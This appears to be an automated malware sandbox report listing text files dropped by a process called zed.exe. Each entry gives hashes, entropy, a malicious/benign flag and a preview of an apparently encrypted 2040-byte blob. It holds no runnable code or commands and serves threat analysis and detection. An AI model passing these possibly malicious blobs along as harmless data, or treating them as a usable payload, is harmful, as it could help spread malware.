                                                                                                                                                                                                                                            Preview:gAAAAABnTC64jyC4ncz3p2JEm78D2q1jOel7SSP3YNhEtLrgddqYKzpSoXEzam1i0O03rZV2m4cld-4QkeB4Sg9UCy33URYx2Z5MkiKEAxd9tCesn_UsSt7HA5cPRrFXjEB4ihw9ZVr9pE7Qo3KRt8WEF5bbGAiAgJ537DDCI_eDJo1O70UROAg_-vfrpXqbMVWv0SWuW58jB-h0caUGogF6f30wV8fWE61ljUg7Gpwpyk3aOMdusv-WA1ursnSMIsySFkv164ehK_YcQ_kbO828eA5fxoIZ99YFDKeLS6tDjLllPMPi7fEWcUAkp3nLUR4kxsZxUtJ2QLzIx_tHxirWB9nAiQhT6vFVhfwp55uk1r-L79qIcztdAUPyF6QncL9NXzwCghoOYQ254ANiF0i8betA_O0NFuRj3Yd-zsmwI2whZ5WoyjlHzZCN1bklpoxFEtqL4ESeqH9Fp4PUXgjldR8LrfrI3yMdyMUnDYmQRLY62uS8xx2OJqRExH3vdaG_TPG8Y3rp2VALxFDiCpldE-_AWAEeKdDCx2ElFUG5TXMUBRDRDp_vAi5iZjOQvUrzHRmJKVecdS3dI3XUPZWicBWL-A3MyouYtnneu9ohpSeLVXFhAAg8dRWPjd6Gy8nJ0OoeBpn4pQVDHQAQYMa48XsvsxYIjV1w6_6DILCbl4b8zdoJUqoYJXMRzLnygPiMP-EvPATXLiTabcHiGgyFKB-2zaMeKBHPhm9CjOKW9bZJ-0HiJ8INx5tWG81RF-KL8CQTm_DmDyRs3HkAsZ_LZxGSNWkYdFNH7UfNJm2j0LQ3r9vur5qg7hfsyouyeLUoSoEojXuwH7mz2Qj4xd3hQZLvEq5fQSWGKNHUpREtG5hPitSOhz3G6QnNDfccg-4fRyQRIxGbMA_l78PdFnzFd0M3QrfXmIYVd0GGcN6pApH3obrRizDVjKjudzxWieJRi--8EO4hP1xFhCRFo10c9EerNAOvJzKCKSnd
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.982535369794739
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:ROyB3X5ApDpUgFT/+yB1Wk/uufc0f7FUZ4TFRFq62k+p:Rlt5G9UgFCyP3E0hUujF5o
                                                                                                                                                                                                                                            MD5:176A1847630162BE410C8B63FA4F14D0
                                                                                                                                                                                                                                            SHA1:64B6E9836AD935E0194B0AA567EA7B8D87C15462
                                                                                                                                                                                                                                            SHA-256:E075F042DB34A8E631A5B0A7A4DBE5A2AE135E98A1A800AA1C78BF901555CB9E
                                                                                                                                                                                                                                            SHA-512:7770B387A12403DB827DDA3CF90B972DF809C789BE9D95ECD5492569FA5A22A8290026857555F03F12F3036679DC9FD769B9BA02D555EBEA02AAF31F22FCE009
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64o7yBi4jDINMqGoX4pY6VMiYVBqmtYVdTB8sE8AoaPrHuXgN-yATwZODd__6oWLiMtcddiABRk7e6DR6rNj0p5KLASoMKVqeoZXpkewbK-QpevjroAKfl_mn2qmCDsbBlChyHCvHQ0A6e1tT0ofDIxoGgoM6gBe9kD9TftEy2IGPWo4KSKj-hilANtvipPNSGMtiLDM0JsXDkFAfi5s6bbks6u6RelhT1JzIyG08wyfO1FZFhHP3MkjzZcPFnkJefDq6TTXQk8EePX2lHizMeUVuvwI8FjYfi0WRnPd5Xq0wa563_Rwh0SU9o03R1-YG7eTNf9IQ9N1KEOA18lCizQ6jwxop7PjmZJR0pl-oiTZXQPLYcoxCtToJENKON_LLomEfVqG7xavqF64fL2Vi-CYMwCG5wd74M4QyD8V_npntPqouSYRGfnI6HFaNoXNDvaLfg-qfJ7xZGQPrPzo3m8Z36LVQc115Mj5NdIh7S1GE5uo52c6gJxd8Vv_mdeW0cexnRM8dCZsC7EeYYIPDZQUSrwdd7xMph0cQYZ18IL1h7yqyHTCcndPBsSUh8MHuiXmkN-lX5ZOpY5pkgRMigo4JK9G8OGFjmGo6UMcSIUTWHzorl-wNw4HGyOlhDH0Oh-O1ahmzSc4nw3EZMtljSdRBnUBqpUamLOZPjkufwvNI3TaSoBU_eXIKYHLpRkMZHscFWaV6QBbtBD1CSmq13PMVOYJsqX9qOCnowNcv_W6XoRRWBOgQeA8dmGP3JaJNvVXiFW9On5ogXapY4-Nq_O-BqGvTvSVTJK9zYOnhb4aZOivDEj2acV_dxhmKuWtapHjkZX06UUyKz3yFgQKFYp5eS-USDCmPByR1yhAbxI4y1TF__7cqYJEM9SqPcUxRvgYU27rhoB9r6NQWEXj_DNgismcOVOvP3m9re9PKz0a9HFHzwCcWL0q0IZFi9eZPlQ4wMDj5OEONqKj5rN3ETFPG0v-Wo
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.973920144476856
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:Pu3LTNEHBxz+wyKpLtFOUUUTjwje8RHJ5gV2043sX:PKuBBpLtgzXHgVCcX
                                                                                                                                                                                                                                            MD5:BCCE9A808BBC7DFA9B43C2263123B311
                                                                                                                                                                                                                                            SHA1:C5ADD0973E5232776031F9A7CD5D098303034233
                                                                                                                                                                                                                                            SHA-256:5904EBE988A5A0B58F9EF697370DD716A514EF9BC265EC1F6BE2586D3C14ED76
                                                                                                                                                                                                                                            SHA-512:AFD23F27F39D79E7B4C842FADF963884A2F07DC09C0E70465CEF108C10264B4278374815BF5CCAAF326B2A817A99169AFCA7A285CC092C65EBA96DEC77BDBC83
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64tjZjaqhJ5hVW9EowNLAK6cFjjpNOr_7Rd1qWtK0Zl54ohZigzyv_Hoam6CM3mYKfja3xR5yzSzB57_bsXG3m1qPjHFCJ4bkeqNXfgrHvsXzdSp6GczzokAmKapW0k-A3oD_GWztgNDzLi-GyptCTqMpIAcfTwb-ppvV20Q0MycksKyiyDS--c3z89jJHt1gcjXPHodswRUFqjInEc3JgTYG0fpFf6yFt42C377W7I30gfj1ti1gz73TSnMIHZDRyKZ6h9ATdUFIC632lgl52RFz-olGzCG71KKlKqNZYgpta-K9aQ5AsXN2LM3t32spKJPwcmUnZZ1fW_uZg_kUE7HmSSUGLvx7FWnWoD2yZOpO9RxvQQE4_D0eWVfprXwAsvfTjzN-hyFVqCxwgj2ul8J_pMg9vmTRzBkD9tZD_ozIZZYUmObU2W8Vle27T5fHnbX9f3TXlb0jd-F999JcTvKw3BcHWyPoRVoU0PzrJfan_WvV5UNtWWXEhiq3wautRZ8Q0oooiv274gCOG3nMtwaV-6vXLks7To31gaju4bz30-IsRYBfrge-pAeIMrhy4CjG3rmvtqB2EdjSGIhtXkDF80Fe2el5jbF1_DdLbjRK3oK8J64kgJV2flonQ5v3iNRimvME8XmlXZKWwBIkicYdh7k6DiPbBCXTS-XxNxbnG1IoC8yb5EH3OGw-rosiymnym70k2VBTq5Zz-ckyQ3zOIxLZL48hPyaTuohS-rbzSgDDwDw_vE_iQfLzatYx2HGJ8WrcE3iquzCqi3H7w_uLOh2ccvR_tCXEqBDRSIU7id3suKYtntFznPyQcK7ntRI2UY7ND3xnbyaFqveQuaDLxYFHWzuyBIzE3nJmLCmWsMPXK0JycjAEjFiiiEcAyB4gtMtLFzKKHqa29WCmLYpfh0qquRzjaRYhO2lUXKhBCXppHlPtqKYCMHxjUmJBzJlM6NmZ4QnBMxTXkBLJQPPpHABzM
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.975494148027447
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:X8DV1ZFBauyfm8x6SkVkJdWEVHZgubYEm8JQPFHu:Xq/e5x6SJI81s3FQ
                                                                                                                                                                                                                                            MD5:720DF5F252B15CB056916F369E755916
                                                                                                                                                                                                                                            SHA1:CBB84AA0E3E8E5D1FB1C2901C9C76E0F73BE49E4
                                                                                                                                                                                                                                            SHA-256:038410EC3D5736F51DCCEDD9422809374331C24214F2807DDA9779F4A32C0FA5
                                                                                                                                                                                                                                            SHA-512:B1D63153EC86EE267C976EF54B12D4C726640328D93D2D2A42DD94FD3F259D7634095D98563E75F310EE60E8387392D9DD1D133450F5A2CB30AD6C33190B7D9B
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64cybOISFORMe6cKwcWXZRVdYj9-pmWeTG3vcxucslVg_sqU1JYCagFcZHwz0bMy4PYU4nB-40sx_oztOa-KaPa5pyHcpiHB-u2Z0u1PV8qKlZS4vxBHQJN4xb3RfR4igKia6o-iWqNHC5FaEuvV2w_YIbkziyPI-AGJxpqZhADmGRZVxZLgMuIYvQHuF1Sye31WVaaEgzniFYp7WIXabNsKDEdST426ESFGPVxAfrGFKwQ06Iz267UijRt7BTO8a8Zu2oDnmeOXGsMBTI89PMQump7IboGnf3EU3_7ZQSo4hDk4XafIMUNZb4ZO42W-TOZ3khCX3Ck-3vHtly-M08b9JZA5bsn3B8HlAQEltpb-35SS5ontpA8It9oNi2BoyDNhyg85GpH4IF9iQk3iH7ak9KaAtnC-ysXrO11--jS6IqhP19UNQpL1lUF7-4230VhItK8zY5uovlMXxwXX4SCyeaAw3Aquv79R3iGuvCHUqOf2TNrMlKEok4_SWNiTxNvUjj4pPTV21IqG4K4GWkMzJ-dRmAIu1rFVoYNys89R9OlLN0QerdKPDCDGe6Ko3NN5fMikMWZ6FY1QVRMcgGMbw7wNiDVR0eI9MT--7YZTfQCdwTu8eQHvJWRRPlYh-QIEC9iUOQDWd9P1-ozK5_FLQvD3dDrPcvoTdC3831tdOZomHqZgkfXZdAX4LiO00PB1Ii1C23NLF4ivwDcGoQYVi-hBJEtOgHMwatnQ7bD89BmjfhnpxnUrstjbQUffquC9eWNuXl9zdDbMNdtIkRPhAkkmrC4j2WApU_ejfnyHlZKZMDdWrWEfYl9a-_td_zaJoTMTry7llxSQ5tnDbLJlM4oJ31aVfQ5KYUeuhO8hR-TVD84ac25lXDEbqx3rzYTk6R_e7a44ZDXHipMDrJbJ2D4lyoKClen5VCiVGGoO-Z8m59b4O-Z_ySqveEoX7vXvPjU4dx8-3qNlMnGGGeHKZozGSE
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.984780448552038
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:nWN6zdPpfkMT6X6tL9uRDaiHmvKPzYhN6LgEkcXOrgZXZ:nOqbf986fuRNmCPzYhN6Fk3Y
                                                                                                                                                                                                                                            MD5:BB11B2D9502206A29A49902419FB36F9
                                                                                                                                                                                                                                            SHA1:4F60C70A83F5641ABE36A7567840137319CB78F8
                                                                                                                                                                                                                                            SHA-256:784CD2910D7AF0348507C7E3F0928BB3ABE78C17F89F2241286E6A4B66E14CA4
                                                                                                                                                                                                                                            SHA-512:8E18864C942E6E56312D8BFF7B153E2104F9242826D1DDC61A0358D393710A831BB559A44F64EEBDF376C8542CD9DDBD34B5E4C7D6D534FE66819FFB82411351
                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64KTBopzPojOyRCNECcD9ShZR0-dFaESe4JSgb9JYsfTrmZUua-OIQuysIs1QyKN60F9NjqSqHGuFit-xG5lNBt_I4H1-oD7GAzpfomsI8LdiPgbnQDBaUBBULL4ccHEw78jJ0wM_pOrMHFdMYEoxO4_pw0zeUDM0retC1o_Vsi4XrWUBhmY58__k7vsGIPHT5_hA61LOkbimROZxPcYfYSxwK9PQHEAMFMSiERxFNf1_9ELPp8RFycUxMgMZa8WMyBPAZvwk_CXsGOklXlqE34oHEdp_XoPa3KrWOTjx4EANm2uu3foWLJDHYCuIOZRLsHpavphWTAwekoCuxASibJBUP5lB0Ik_z3YMl1qkmaKr7laVjXF6H180XAet2fY5s_WEh1DGoBeVA00J8TU4s20n05Reg6ofGzBC0CX4M3vxqkEdEyFV4_3llUy99VyZJ5lJnVKpKf8Eic7GUbFFHB1r1HY1E_Ez7BUng-2u0M8wpGemNbfCeEYXj8llm1xNvnixkLEhobmz4LSfX7wmyPbiubDHsKlNoNEgdBRZKO5zvphiN1dQ2SIHb2X0ruyzr4UL6UnPW4GNS5KMIfMu6dZ1k7MW7z7WMWZpDDDEv1roO8MrIEPoct9nMnndKWvo9UGFSXyF8Yv5VDAg98ik5hxqUhI6Xku5eOIDsh97HFNf117TFkZNcrGgFTXk0ZKQq89O-fLQack7Gxz8sjwLmfWI3WE2XsDVyfB7BmIlDJXntX-o3gatCZt_2LAxH-HNOFCGZURN_XysqF3leZn13p-5D71lbYaWY6paEClZzq_AG0CSK6AausD5d7KrA_haxPmDPWsX6irCcCYLFoxnZPjtK-f8F8ddgGLG3gPc_zemUukxkfmIL-41qW3sO9zUeVRCyB9oxKQwG7-1wCs6R_m1eYKFSEbnBSaCvnzl20OT-nXYWfVY14RaGVEAY5ViARW1oCOEeKLpd2uL1_p8FUfCSiFve
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.982404749795765
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:LqyuNJSmSBG7TcubqYLcANWKMmRfvaVmygyEBG63knHFif9:sumSuTcu2YLuKMefvakyV6kHk
                                                                                                                                                                                                                                            MD5:8FEE6AF506658FFD981F1D51498749AD
                                                                                                                                                                                                                                            SHA1:FB0C21E24F538A8AE6B50234AE826B794EE5F7E5
                                                                                                                                                                                                                                            SHA-256:4A29AE2DB2AB3B3BB12367A5734383E8B8601ECAB6969F87DBDFE7ED0A9F1E70
                                                                                                                                                                                                                                            SHA-512:5C80D211EEA7FBBB41EEB66DCD5349030774D47369AF9D48B75C95F3122B76F1909D5062CEBEFE287F590D683863A3AA465A5C561108399B28947B0F5E1ED171
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64mOvMy9pxwDqWND41w0h8wyrWzZ-0dXNMPIHtM2bjsORBX2_BJyN0fRW8a7_3a7LYIF78f_H20fktwcUdTB9wOgMC66RfruucpIPM15boZeslqbZKmWfHFoIINTZhwLCyrXcbRUR120TdGgIurElD5z-Yk7kLIY-fQHOrES-PXyokSbFpBtHL2avyeCoO1kFG-8iKey8zKqeisXJ6NYdQPyzITU5JtPTdtx4BUFAVOHQI3gtVWFXVGy9ThsQ8_XZ_-sEVcscbCdv2hVHwqaZYpWcGtBlhALfxJiDNV7FsLJ8S1Nis4vCo_qSgZ1IqzM2KmO9zigTJDWRcT5oCCxOTWzEgfx-8xKguc13465V1DbzdKM-p33K-p76EM61m2cwijULenjqXxFy1HkjtvBWCEUIKTMnpYNBAIZRk9T5RJam0RlZLe1ruiw7W86tlemUcbjtgUWfnnqqL5Qt1EPQG7YQ_jn8E3kShEnS1EqguLu3xdu1tAlx8MC5VVALfvWABs-2pLOCJ8I8qK6VmaEbqXUCkMwkLHP0XWFGWVTPJY3pkV0QnFnyBCKMMlErOSzyNgL8uQ6IQgN8bCgVVbQPRrI5MmRzUCFCtkdz739IEOcqid1zu5HXo3N1XgdsfDA0FbF0xY_LQNW_9sNAMBxY2pm9LdgrYaeCoV841p56YXm6pqznAgVspAZqHAH4iWUNgbnbdWsvsCaakFytYHSAorSkHz2rW7xx8l8qneHnMGeI-xywYAoX5xEj90384eGxunJgZ875USu-fvnZtWp0nrXf8_QLhaBsUYP5Qj5bmtg1kf7l60V4YoTK-5KcV0Mvx0QN81PwoosYFAZHo2DK4bcxE2NxjSsyBGnJcTC3_n-xLdXvNa2tMJZxUzinpqP4oY1JMNkox0bkV886kmEXBMXNVw_J1_8P1CBM1uwBAKX2hKfGTusFTxHkKrzVb5mJaXaWL0T69rFQOv7dwA71h-IkBBqy8
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.9741167425582695
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:rY7yXxeIFDK1En4vxda+pgWz8RuI6nxht93j:rkIFDJI8FUn3n
                                                                                                                                                                                                                                            MD5:49F0B4D4D025F839398E0EE310567B6C
                                                                                                                                                                                                                                            SHA1:5206B32A9D8D712CE6A512478530BE14ED520C76
                                                                                                                                                                                                                                            SHA-256:DEC77F34BA2D779A5DF5D661FBAC09E6B7DC27C062DA2278A2F48CA9D85B64CC
                                                                                                                                                                                                                                            SHA-512:DE566666531A3DEE347F9F390C202A3770B43DB2583EECBED835FAE05B0717D93A526C4928758493D387F056F42FBE820FFCDF99A6A38526866529E345D6D3B9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64lPP76TCyGpR63aqL5QUTdQ83v4o22G5bLUeAv3Elj23OVdjR1_TkAFr1Mhi00Gc9856PqgoAZ9p-unHdGhsd0_8hG0HLQzX3TCzvdiFzhlAwOjSzBU9rKOPMk_H6n4xjlkBgA8VkXNnTqyiYTkXpasbSxgktSRjIWWtEnO5GKEYxzq_TduwoS-DKJ4nmxh7HhINNeSJY9UQLlEPs5x3IJ2j4knPzrwFfVP82XgC27yDMzv1GDoqDHXURULZbcGoF2VAiQlsnn5CPZCVJY3xHaEQoEDloM0EfhTypK_OgGvWdNCUOiGWsgJuKNTSfoueoZZHZCtUx0tgF_TN6mUVUu2EA3-kKIAgbjxeja1MAdgJGdk--rKvrqOnRLfMl4PkqDKWjLCk2esIpNQHmIK4mKEVJWKPfl5GUg_BgyVV6DaCZMVRgNgeVk6ZuCM7sZVdsqj9iIEyzYJAowDNxcNAVIkMont28yMkqWz_Xb0KzukqAZMGEaeItZ09XB1AaxBmG-t8SHeoj869ldEx7pMcSKfQg4B-Lt1l0cvGrg4amrCW2ElT3vX-pgpD34Fqnlulep5d2nE9l16UqCN_AJ19KDe4W71BzxwGWn7RjaeMDMHBbMlEil7Aod7zzj9YOUCMKdngzCEJ_ACwwJHr2xvB6423lK6BHeM95846X8SAB96l16YMvLb2Z_9IzeKg7uG0SncDUzxJBaYZUIY2To127kBGhFRS96Zgk0xHnn9J4X0UHGkp9MilPX9NEIYye9QchtrnTYoDo4mm5CkjTEUq2N9mX--hKykU7FK1Fp3LBWWXyLO8TY9jBZBNZ7jq_lXffT2jQSt0jurpHLADV1omVXvKbIxlCNUbogyBfvd0aVq_vpfxuqxaDnMYg6B6bNdrWD7k_KI6_3cNLfewVt0ejQDkgrU3oHA6fKlvIPU_Kf-0cjf9bIP_3Xgw77eJiGr8S6S3lpdLmpvCCMubiyscmnZYAFAPU
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.98154096050899
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:1DFWQaFJyNIUEJC0C2s82B7cbXqOL+hoCMV1+AYNIGbYRhfNcEVe:XWhF5r/DkkXqOL+hPM33YBbYjK
                                                                                                                                                                                                                                            MD5:074748BEF5220EDFDDA68A664B947729
                                                                                                                                                                                                                                            SHA1:65E8FACFEED4395E306D8DF37E5CCC24A1634589
                                                                                                                                                                                                                                            SHA-256:6D49E90F7AEC1483EB4F81FF62D39F79A3FF9A8D0F6BF0A7CEE69AEEA8E930B2
                                                                                                                                                                                                                                            SHA-512:390DFC269CBB37AFE95E8019FA8666C815FC6BDF3DE9152EBD05A09E9DC02E0708A0AAA9E4BD135BA4B26D8800C3A8522E72E3C30E7B3AD77053644CF7EE6C3E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64B34-cGp8haWtUzzVuUf8rg4f77jKfjGDeKCLg1mZxnhia9b6NCSZ9l_QwqmDpWXJL6Q8Zd5Cp-QvqwIdVLgJoal8-w20RsRAftr2vl82t_FkZNmJ6uZDtWjYEcQUkffGtFviShJECrc-XzBzstGn_i8PR6RiFbhux4HRD6uPW0Khs9NlpHlEJNVJUHnfpYCxTcnqYnKsMirnSY4wVyCOO5yH9d28FiH9cFO-lAIIuMLCUe9j-Kn7DULP9KODMzUpwZU33eHqpyYxci2sCcHriDe2KNML53IsnXDOKMes5sOuQBsGN4-3VSdM1ByisGckBtS-UTkVI-OI8xoR4n6q17kBF91yxXVLMj0AO8A3HiXrFKjvRaNaoUKEZhikhEh-aIcSdjNEpgGqXYz0mYEUxLAXKl360yexQYdaISwldI_kCuKgO8AcIgsA_UhniGxMuGMy_PNL4meIVwzrCvfNsJJgtIRIatOl6ZLINlB2MYI276Od0fWJ7uzOHgQ16BMbGNWIazUCRddFodilZlvERWx1G58x9mFni-U-WV3RvWLTfBWkT2sb_xH4wmOdUwmRy479nmqSZCtxCvtb40AxgXz--mJv07Te-12AuWQuqZduJyqOmQ8alJaObPRK2dtpd_Dp73t_2d4x0xHJu9gy0AxCyINvvuskQMBa7rA0EI_QweokEI5ginztT5F1KKyoPrbTgkCsJM0O6DvrDY1QR2ijqifDv9XtpLjfrxjbFlyZr7ik1fIxGdVNln5LMm5Tn5dyrE441mU04I1fFJINgZH-DFo3s0Pl_jd2wNDy-Q3n3CnfGP7-BGLCCRSIVKoeCoqWW_muOxxIynZz7Ad6IFmHpXXfsnSLfGuJkQujOjhIKn48FRRMeF5oKoYWMwho69kF3vRrONTcPps89HB6zwNWVf3lgPTwYCk-5tShbMwAT5c6sGb3SvW7ysGofSx-ulFbExyUaWw_mQNqsCbB8qm9CYlg
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.983923165623477
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:0u6Eww8QPbeJeK1aEPJTdH7eeQ+U1wuCAiIbBj2YygcRjV8bBVc6unQF:0u6EpVOwEPJRU+EwuCClKYp+Gg6+QF
                                                                                                                                                                                                                                            MD5:45C3DDF4049005B0E1CBFE63F370CB80
                                                                                                                                                                                                                                            SHA1:775C68F4EFA934B0BF48CEDDB7BE7741F704F879
                                                                                                                                                                                                                                            SHA-256:DB9799A2A4B48F2B94C56CE286E74BA846EED6BDEB745720F25D543FB87A0189
                                                                                                                                                                                                                                            SHA-512:279F73682A756CA7DBF39DF15EB10545F73C2697476B9517165166AF807D984299E002DACB48D5F476C4F1F7048C6A40F171C588EB1A4876D4ECA964E09E51BF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64dESwcAoowqK3Oy_-Ru0beDSEjrNSTpmFtjtAa9_Qi1jcAloculAGRb2MuBg2bK7vjNqdPt09Nf5441DBnyXAnUhUVLZolnN2oEC46V-f3KFUhr67PWkdNQsXukykHwa-9fLyPiXKqr5YGXfucCdmvQi6AlCynCGp41XAdWpdY5rBtUgp13a_V_8pkh0UDU2_evJSabDUIr_7p7zb1o4FLmhoE38ylKXYK2Ggiii-LakgHgD3RqkbbmZ-KAlucSLh0nNmtcl75JfMwWIFIUQ9fvgDZQPK7mrD2PUrX7E9aJeZhmGkTwg_DsTlz_9JyzuOKPlxaD4YNkD6kowTjo0rKdcnOWgA97lNonSMx7kP0wvbOI0tlL2LCcadCdBklBj47u6tz8MEMHGNVCpqjbZPEGIvSuXp-IzLzkBRA-LRc-0N-hfV6x4g8T4cA3OXmbWGXGn7EXjgoxPIhwxNrwFOAX-P7rWWrKxJYpmb4dTg4YC6OLp_egEWpcYxc3N9oNQpmnUIhwEVmgX0X-BaEcwravKQq-aFO98U-7aXNsZlcASlYZHHhH_IWGLPKUv7OZN8CR_OFTZ_ZUl2qjKXnfeFx1HZaK2m7Q8l6qW1rEvds30kBa08g4bitq8GSeQxzr9zErGG98F9WDlNck8I3W6I0TAE4UjPp0qCpyjvVjpROY7eyx511Egghz9k9_lTSYMQA-FKZosmAdhzlMbQTLed28HzMy-_AYbUuYbhsLOg94PwKFXJi-VoYE1TlwfKQhCB6BJKFXtv7I4Ho5FlaKM-u5MeQRlrE11Ztaux-5tpEbiT8T8LdAz6AljBiqSetm2LvZR8EgNhv5_tAaizus9D5DNv5nvLeZpNsvkk1Ps0sk4O-NRsnPewK9voPsLbAPbIGnwASBD1Re9rjIDkI3WKR-_GMu9TZxbGM1N0HYmSC6JIdTKeVEGNwc1nKFw4x726FQ4dp-ErYt8S8Z6J9T8MpARc1uEm
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.987651813487133
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:fMSG/F5ZpP2EstW/pEes8IlYfxTkO1TxRvhb1D9J2Q4Fp:ftG/jZpP2LSpEeRwYfxw+jJD9J2vFp
                                                                                                                                                                                                                                            MD5:561593EA58A867CD031DD3E204E8598A
                                                                                                                                                                                                                                            SHA1:C5CC374FFFD80C994AB5EAAF1231BB88C089A149
                                                                                                                                                                                                                                            SHA-256:5A60A1737214FA31595441B31A594F42D85BD8DAFDB7EFA707E78BBA453C0D07
                                                                                                                                                                                                                                            SHA-512:52B91C7005BA92C067B2498876D4F96AF92672ECCBC2DE1517B08D4B015F03901D51202CF1EA5732B3861164D7F2D85E0D0E56C8B12789BAA8A826619DC3BF69
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64pVUDakTniO9zsbVbcT2670yJilkXwYU_NBQEn5QXzxbXU1f-zBJm_5Tubeud-tI-tIr-aZSV9bvkOaA9uZ4b1zx6hKgcfYLOhBfUjJBCxKIi4n-Tw00FJgdI0YvfTBqgJASCSeChJFe7nDUdQQsCU9b2_kR_h_-B7FN-Rf-RJzWzh6msSsM2RtMSMQZIbkORF-vYtTHz6Vxn8SyMd4FYxxFHWvP2_GIlqoN3ama-nM-JWfMwPVi7X_zaI5AgJ9fk_Vvj5N2_HgphNlDZuI7EWoLkE-W9yuPgQY9ekm3aM6jlq3esSb0YrKSHQamTUR_XpKTQRRsu8nqaBSp_PSmEtse6_2Spltvx6y28m-4N3repcfR0jc6xss8hORkKMxyWV_NGpxPCGVy8b8vbdKs9fKr-6kqQ0I1gRgiJ39FJOPmHeQPTsrdbgHzjQLjWk3Zjlo1WNfhLkO9MfOpwaNpicr5TiAFPfToQvbgDOPhpGwhiLler41he43bb5mkoX9sFldPifmOEzAMLXeudcb_7Xvk-WGSw7S6DCcaWP_oZu9P4bcWVkGKmhlcKC7GwxnQaU-Pm6qPqVK3wR5yQDQwXUfbcrfNNIXEu-mVQd8PizJ2DiP-y5gP90_mz6ji240u7Inq97C9AtRLiXj7NMHt249BFhVCUw-Bqif498EeBc-06HwIBPdzkAq95ZUL7KzIhjAZ_LJb8V_mIPo2lrLS1NT7v4I5OJKo45H4FA2tHZ8FlMLSz3_KcYXq_Noz5TrZT4m3KvBDytLjBZawogr2Jn3AxRmFqMnOlUUG19qCHX6kqc4n4n-YJgRjAwlJXA3HRNDKzLxpuuWH6k9Lc5K07TIIPBV4lGSoPD3UjiO_VSpF0bTTaZpLtwaLWDGQh-TJ1SvqSummTxXKDvu6bgKQy0bdObEm9Urta5coagrv806xN2ET-szdBobPA7oxnpAxYN1RTl2iPuEXBj4S66GFtmhWqIKxs
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.985557896041337
                                                                                                                                                                                                                                            Encrypted:false
